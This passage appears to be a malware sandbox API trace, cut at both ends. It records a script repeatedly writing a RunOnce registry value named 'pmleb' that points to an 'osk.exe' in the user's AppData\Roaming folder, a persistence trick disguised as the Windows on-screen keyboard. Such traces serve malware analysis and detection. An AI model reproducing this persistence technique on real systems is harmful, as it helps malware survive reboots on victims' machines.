bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.601] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.601] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xb [0077.601] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.601] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xc [0077.602] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.602] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xb [0077.602] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.602] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.602] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.603] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.603] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.603] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.603] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.603] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.603] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.603] RegCloseKey (hKey=0x280) returned 0x0 [0077.603] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.603] GetCurrentThreadId () returned 0x544 [0077.603] GetCurrentThreadId () returned 0x544 [0077.604] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.604] SetTimer (hWnd=0x20280, nIDEvent=0x200b, uElapse=0xa, lpTimerFunc=0x0) returned 0x200b [0077.604] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.616] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.616] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.617] KillTimer (hWnd=0x20280, uIDEvent=0x200b) returned 1 [0077.617] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.617] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.617] IUnknown:Release (This=0x787518) returned 0x1 [0077.617] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.617] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.617] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.618] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.618] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.618] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.618] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.618] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.618] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.618] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xc [0077.618] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.618] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xd [0077.618] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.619] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xc [0077.619] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.619] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.619] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.619] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.619] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.619] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.619] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.620] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.620] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.620] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.620] RegCloseKey (hKey=0x280) returned 0x0 [0077.620] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.620] GetCurrentThreadId () returned 0x544 [0077.620] GetCurrentThreadId () returned 0x544 [0077.621] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.621] SetTimer (hWnd=0x20280, nIDEvent=0x200c, uElapse=0xa, lpTimerFunc=0x0) returned 0x200c [0077.621] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.631] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.631] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.631] KillTimer (hWnd=0x20280, uIDEvent=0x200c) returned 1 [0077.631] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.631] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.632] IUnknown:Release (This=0x787518) returned 0x1 [0077.632] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.632] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.632] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.632] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.632] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xd [0077.632] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.633] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xe [0077.633] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.633] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xd [0077.633] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.633] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.633] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.634] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.634] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.634] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.634] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.634] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.634] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.634] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.634] RegCloseKey (hKey=0x280) returned 0x0 [0077.634] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.635] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.635] SetTimer (hWnd=0x20280, nIDEvent=0x200d, uElapse=0xa, lpTimerFunc=0x0) returned 0x200d [0077.635] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.647] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.647] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.647] KillTimer (hWnd=0x20280, uIDEvent=0x200d) returned 1 [0077.647] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.647] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.647] IUnknown:Release (This=0x787518) returned 0x1 [0077.647] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.648] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.648] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", 